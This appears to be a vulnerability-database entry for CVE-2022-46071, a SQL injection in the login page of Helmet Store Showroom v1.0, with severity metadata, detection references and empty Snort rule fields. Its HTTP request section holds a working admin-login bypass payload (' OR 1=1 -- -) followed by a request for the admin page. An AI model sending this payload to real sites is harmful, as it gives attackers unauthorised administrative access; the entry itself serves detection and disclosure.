🔙 목록으로 돌아가기

CVE-2022-46071: Helmet Store Showroom v1.0 - SQL Injection

TitleHelmet Store Showroom v1.0 - SQL Injection
AuthorHarsh
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.74602
CVE IDCVE-2022-46071
CWE IDCWE-89
Tags cve cve2022 sqli admin-bypass helmet helmet_store_showroom_site_project vuln

🔍 Vulnerability Description

There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.

🌐 HTTP Request

POST /classes/Login.php?f=login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Connection: close
Content-Length: 38
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip

username='+OR+1%3D1+--+-&password=1234
GET /admin/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-46071.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-46071.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A